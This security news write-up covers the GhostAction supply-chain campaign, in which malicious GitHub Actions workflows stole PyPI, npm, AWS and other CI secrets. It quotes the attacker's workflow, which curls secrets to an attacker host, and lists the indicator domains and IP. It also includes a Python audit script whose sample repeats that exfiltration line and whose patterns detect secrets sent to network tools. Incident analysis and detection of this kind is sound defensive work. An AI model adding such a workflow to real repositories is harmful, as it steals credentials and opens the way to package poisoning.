
The Python Software Foundation has confirmed the invalidation of all PyPI tokens compromised during the GhostAction supply chain attack in early September 2025. This decisive action follows an investigation confirming that although threat actors successfully exfiltrated tokens, they did not use them to publish malicious packages to the Python Package Index. The attack, which targeted GitHub’s CI/CD infrastructure, resulted in the theft of 3,325 sensitive secrets from 327 GitHub user accounts across 817 repositories, creating significant secondary supply chain risks1.
This incident highlights the evolving threat landscape where software supply chains are targeted through developer account compromises and malicious CI/CD workflows. The response from platform providers and security researchers prevented a more severe outcome, but the event serves as a critical case study in supply chain security for development and security teams.
Attack Vector and Initial Compromise
The GhostAction campaign was first detected on September 5th, 2025, through a compromised repository for the Python package FastUUID. A maintainer (user `Grommash9`) pushed a malicious commit titled “Add Github Actions Security workflow” on September 2nd. This commit injected a GitHub Actions workflow specifically designed to steal secrets, particularly the `PYPI_API_TOKEN`, by exfiltrating it via an HTTP POST request to a remote, attacker-controlled server (`hxxps://bold-dhawan.45-139-104-115.plesk.page`)149.
GitGuardian’s security team identified the malicious activity and promptly alerted the FastUUID maintainers through a GitHub issue while simultaneously notifying PyPI administrators. The maintainer reverted the malicious commit within hours of notification, and PyPI placed the project in read-only mode by 12:11 PM on September 5th, preventing any malicious package releases from this specific repository19. This rapid response contained the immediate threat but revealed only the tip of a much larger campaign.
Campaign Scale and Techniques
Further investigation revealed that FastUUID was merely one victim in a massive, coordinated campaign. The attackers employed a consistent pattern across all compromised repositories: initial access to developer GitHub accounts (likely via phishing or compromised credentials), reconnaissance to analyze legitimate workflow files and enumerate available secret names, injection of tailored malicious workflows that hardcoded specific secret names, and systematic exfiltration to attacker-controlled endpoints169.
The malicious workflow used a simple but effective design that could be triggered on any `push` event or a manual `workflow_dispatch`:
```yaml
name: Github Actions Security
on: [workflow_dispatch, push]
jobs:
  send-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'SECRET_NAME=${{ secrets.SECRET_NAME }}…' hxxps://bold-dhawan.45-139-104-115.plesk.page
```
The scale of the breach was substantial, with 3,325 confirmed secrets stolen including DockerHub credentials, GitHub personal access tokens, npm publishing tokens, PyPI credentials, Cloudflare API tokens, AWS access keys, and various database credentials1689. Several companies had their entire multi-language SDK portfolios (Python, Rust, JavaScript, Go) compromised simultaneously, and attackers were confirmed to be actively using stolen credentials for follow-on attacks against other systems.
Response and Mitigation Efforts
GitGuardian undertook a massive disclosure effort, creating issues on 573 affected repositories. This prompted widespread remediation, with 100 repositories having already reverted the malicious changes before being notified. The security firm also notified the security teams at GitHub, npm, and PyPI on September 5th1. Shortly after the campaign was discovered and remediation began, the attacker’s exfiltration endpoint stopped resolving10.
On September 9th, a second wave of attacks began, targeting primarily previously compromised repositories with an updated payload. Approximately 500 new commits were pushed, affecting 14 new repositories. The attackers used new exfiltration domains (`hxxps://carte-avantage.com`, `hxxps://objective-hopper.45-139-104-115.plesk.page`) that resolved to the same IP address (45.139.104.115), which had recently been associated with hosting phishing payloads19.
The Python Software Foundation confirmed that although tokens were exfiltrated, none were abused to publish malicious packages to PyPI. Mike Fiedler of PyPI explained that an initial disclosure email from GitGuardian on September 5th was missed due to spam filtering, delaying a full response until September 10th25. As a precautionary measure, the PSF invalidated all affected PyPI tokens and strongly recommended that users migrate from long-lived API tokens to Trusted Publishers, which use short-lived, repository-scoped OIDC tokens for authentication25.
Security Recommendations and Best Practices
Organizations should immediately audit their repositories for the indicators of compromise associated with GhostAction, including specific domains, IP addresses, filenames, and commit messages. All secrets that existed in compromised repositories must be revoked and rotated immediately, regardless of whether they were confirmed stolen. Implementing security policies such as branch protection rules, mandatory reviews for workflow changes, and tools like StepSecurity’s “Secret Exfiltration Policy” can help prevent unauthorized secret access6.
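The audit described above can start with a line-level scan of each file under `.github/workflows/`. The following is an added example, not code from GitGuardian, PyPI or StepSecurity: it checks for the hosts, IP address and workflow title named in this article, plus the general pattern of a secret interpolated into a network command. The function name `audit_workflow` and both sample workflows are constructed for illustration.

```python
import re

# Indicators named in this article: exfiltration hosts, shared IP, workflow title.
IOC_HOSTS = (
    "bold-dhawan.45-139-104-115.plesk.page",
    "objective-hopper.45-139-104-115.plesk.page",
    "carte-avantage.com",
    "45.139.104.115",
)
IOC_TITLE = "github actions security"
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
NET_TOOL = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b", re.I)

# Constructed samples: the first mirrors the workflow quoted in the article.
MALICIOUS = """name: Github Actions Security
on: [workflow_dispatch, push]
jobs:
  send-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' hxxps://bold-dhawan.45-139-104-115.plesk.page
"""
CLEAN = """name: Publish
jobs:
  publish:
    runs-on: ubuntu-latest
    permissions: {id-token: write}
    steps:
      - uses: pypa/gh-action-pypi-publish@release/v1
"""

def audit_workflow(text):
    """Return (line_no, finding) tuples for one workflow file, in line order."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        low = line.lower()
        findings += [(no, "ioc-host:" + h) for h in IOC_HOSTS if h in low]
        if "name:" in low and IOC_TITLE in low:
            findings.append((no, "ioc-workflow-name"))
        # Heuristic: secret expanded on the same line as a network tool.
        names = SECRET_REF.findall(line)
        if names and NET_TOOL.search(line):
            findings.append((no, "secret-to-network:" + ",".join(names)))
    return findings

if __name__ == "__main__":
    for no, finding in audit_workflow(MALICIOUS):
        print(f"line {no}: {finding}")
```

A `secret-to-network` hit is a lead for review rather than proof of compromise, and secrets mapped through an `env:` block are not caught by this line-level check.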
The migration to modern authentication methods like OIDC-based Trusted Publishers for both PyPI and npm publishing represents a fundamental shift in securing software supply chains. This approach drastically reduces the impact of secret exfiltration attacks by eliminating long-lived tokens. Enforcing least privilege principles for CI/CD secrets and enabling GitHub’s secret scanning alerts with push protection provide further layers of defense against similar attacks9.
The GhostAction campaign demonstrates that malicious workflows have become a primary attack vector capable of compromising entire software portfolios through automated secrets exfiltration at CI/CD runtime. While the coordinated response prevented catastrophic malicious package releases, the incident underscores the urgent need for robust identity management, vigilant repository monitoring, and widespread adoption of modern, secure publishing practices across all software ecosystems.